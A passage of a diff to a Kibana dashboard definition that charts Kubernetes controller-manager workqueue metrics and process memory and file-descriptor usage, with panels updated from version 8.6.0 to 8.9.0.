"kubernetes.controllermanager.workqueue.adds.count" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Counter rate", - "operationType": "counter_rate", - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Workqueues", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01" - ], - "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [ + 
"host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "7e0ad24d-199f-4ede-8b71-90152913fa90", + "key": "kubernetes.controllermanager.workqueue.depth.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.workqueue.depth.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cd" + ], + "collapseFn": "", + "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", + "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 14, - "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "w": 24, - "x": 0, - "y": 13 + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "title": "Workqueue additions increase rate", - "type": "lens", - "version": "8.6.0" + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - 
"type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue depth rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "w": 24, + "x": 24, + "y": 27 + }, + "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { + "columnOrder": [ + "73933c6b-b6da-45c6-a190-c501453f658f", + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" + ], + "columns": { + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "73933c6b-b6da-45c6-a190-c501453f658f": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.controllermanager.name + 1 other", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.controllermanager.workqueue.unfinished.sec", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" }, - { - "id": "metrics-*", - "name": "b460c8d2-ab24-41ed-aac8-998febec263b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": 
{}, - "datasourceStates": { - "formBased": { - "layers": { - "77b347b2-91fa-470f-861d-ada0e175cbc4": { - "columnOrder": [ - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "34f7328b-5fef-43e7-9350-98256b031a79", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "columns": { - "34f7328b-5fef-43e7-9350-98256b031a79": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.controllermanager.name + 1 other", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.controllermanager.workqueue.retries.count", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.retries.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.controllermanager.workqueue.retries.count))", - "isFormulaBroken": false - }, - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { - "customLabel": true, - "dataType": "number", 
- "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.workqueue.retries.count: *" - }, - "isBucketed": false, - "label": "Part of Rate", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.retries.count" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate", - "operationType": "counter_rate", - "references": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "scale": "ratio", - "timeScale": "s" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b460c8d2-ab24-41ed-aac8-998febec263b", - "key": "kubernetes.controllermanager.workqueue.retries.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.workqueue.retries.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" - ], - "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - 
"xTitle": "", - "yTitle": "" - } + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { + "dataType": "number", + "isBucketed": false, + "label": "Last value of kubernetes.controllermanager.workqueue.unfinished.sec", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", + "key": "kubernetes.controllermanager.workqueue.unfinished.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.workqueue.unfinished.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" + ], + "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", + "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" + } + ], + "legend": { + "isVisible": 
true, + "position": "right", + "shouldTruncate": true }, - "gridData": { - "h": 14, - "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "w": 24, - "x": 24, - "y": 13 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", - "title": "Workqueue retries increase rate", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Current unfinished work" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "w": 48, + "x": 0, + "y": 41 + }, + "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(239,249,218,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Process", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI 
Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", + "w": 24, + "x": 0, + "y": 44 + }, + "panelIndex": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "daf730fb-a3b5-400a-acba-cff0c8ba607d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { + "columnOrder": [ + "6cbab896-ee42-4dad-8831-12f53cda0d6d", + "910bd079-4852-48bd-9d7a-e5eb940f0838", + 
"ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "96c80749-da61-425a-b637-878d33e410fd", + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX2", + "96c80749-da61-425a-b637-878d33e410fdX1", + "910bd079-4852-48bd-9d7a-e5eb940f0838X0", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "columns": { + "6cbab896-ee42-4dad-8831-12f53cda0d6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "7e0ad24d-199f-4ede-8b71-90152913fa90", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2b80230c-9cc8-444f-b092-1fbc4d764992": { - "columnOrder": [ - "e7259e4c-0700-48a5-aeff-993fc075bcab", - "7b8d9b03-439b-4171-8b64-91b8664b4b94", - "725088f8-ac91-4df6-8863-f9abe7ad40cd", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0", - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" - ], - "columns": { - "725088f8-ac91-4df6-8863-f9abe7ad40cd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Depth", - "operationType": "formula", - "params": { - "formula": "differences(average(kubernetes.controllermanager.workqueue.depth.count, kql='kubernetes.controllermanager.workqueue.depth.count: *'))", - "isFormulaBroken": false - }, - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.controllermanager.workqueue.depth.count: *" - }, - "isBucketed": false, - "label": "Part of Depth", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.depth.count" - }, - 
"725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Depth", - "operationType": "differences", - "references": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" - ], - "scale": "ratio" - }, - "7b8d9b03-439b-4171-8b64-91b8664b4b94": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e7259e4c-0700-48a5-aeff-993fc075bcab": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Depth", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of kubernetes.controllermanager.workqueue.depth.count", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.depth.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "7e0ad24d-199f-4ede-8b71-90152913fa90", - "key": "kubernetes.controllermanager.workqueue.depth.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.workqueue.depth.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 5 + }, + "scale": 
"ordinal", + "sourceField": "host.name" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Resident memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "725088f8-ac91-4df6-8863-f9abe7ad40cd" - ], - "collapseFn": "", - "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", - "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yLeftExtent": { - "mode": "full" + "formula": "last_value(kubernetes.controllermanager.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "scale": "ratio" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.memory.resident.bytes: *" + }, + "isBucketed": false, + "label": "Part of Resident memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.memory.resident.bytes" + }, + "96c80749-da61-425a-b637-878d33e410fd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Open file descriptors usage", + 
"operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } + }, + "formula": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", + "isFormulaBroken": false + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX2" + ], + "scale": "ratio" + }, + "96c80749-da61-425a-b637-878d33e410fdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.fds.open.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.fds.open.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.fds.max.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.fds.max.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "name": "divide", + "type": "function" }, - "yTitle": "" + 100 + ], + "location": { + "max": 130, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.controllermanager.process.fds.open.count)/last_value(kubernetes.controllermanager.process.fds.max.count)*100", + "type": "function" } + }, + "references": [ + 
"96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "3a26dffa-0696-485d-b991-1dbc5092082e", - "w": 24, - "x": 0, - "y": 27 - }, - "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", - "title": "Workqueue depth rate", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" + "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", - "type": "index-pattern" - } + "formula": "last_value(kubernetes.controllermanager.process.memory.virtual.bytes)", + "isFormulaBroken": false + }, + "references": [ + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "scale": "ratio" + }, + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.process.memory.virtual.bytes: *" + }, + "isBucketed": false, + "label": "Part of Virtual memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.process.memory.virtual.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "daf730fb-a3b5-400a-acba-cff0c8ba607d", + "key": "kubernetes.controllermanager.process.fds.open.count", + "negate": false, + "type": 
"exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.controllermanager.process.fds.open.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" + }, + { + "alignment": "center", + "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" + }, + { + "alignment": "center", + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "isTransposed": false + }, + { + "alignment": "center", + "colorMode": "text", + "columnId": "96c80749-da61-425a-b637-878d33e410fd", + "isTransposed": false, + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#54B399", + "stop": 0 + }, + { + "color": "#e6ca49", + "stop": 60 + }, + { + "color": "#E7664C", + "stop": 90 + } ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { - "columnOrder": [ - "73933c6b-b6da-45c6-a190-c501453f658f", - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" - ], - "columns": { - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "73933c6b-b6da-45c6-a190-c501453f658f": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.controllermanager.name + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.controllermanager.workqueue.unfinished.sec", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": 
"kubernetes.controllermanager.workqueue.unfinished.sec" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.controllermanager.name" - }, - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { - "dataType": "number", - "isBucketed": false, - "label": "Last value of kubernetes.controllermanager.workqueue.unfinished.sec", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.controllermanager.workqueue.unfinished.sec" - } - }, - "incompleteColumns": {} - } - } - } + "continuity": "above", + "name": "custom", + "rangeMax": null, + "rangeMin": 0, + "rangeType": "number", + "steps": 5, + "stops": [ + { + "color": "#54B399", + "stop": 60 + }, + { + "color": "#e6ca49", + "stop": 90 + }, + { + "color": "#E7664C", + "stop": 91 + } + ] + }, + "type": "palette" + } + } + ], + "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Controller manager process data" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "303702e1-ba33-49f2-b337-4cc7d7305606", + "w": 24, + "x": 24, + "y": 44 + }, + "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "236aa40a-181f-4c61-af17-8df4ecba80d3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + 
"formBased": { + "layers": { + "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { + "columnOrder": [ + "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "d523e6d2-50f3-4b45-8815-8259df43850c", + "cf481e4f-b568-4306-8da9-5e3d516ccbea", + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "columns": { + "7e1756d9-af1b-4204-a8d4-8c57987216f0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", - "key": "kubernetes.controllermanager.workqueue.unfinished.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.controllermanager.workqueue.unfinished.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + 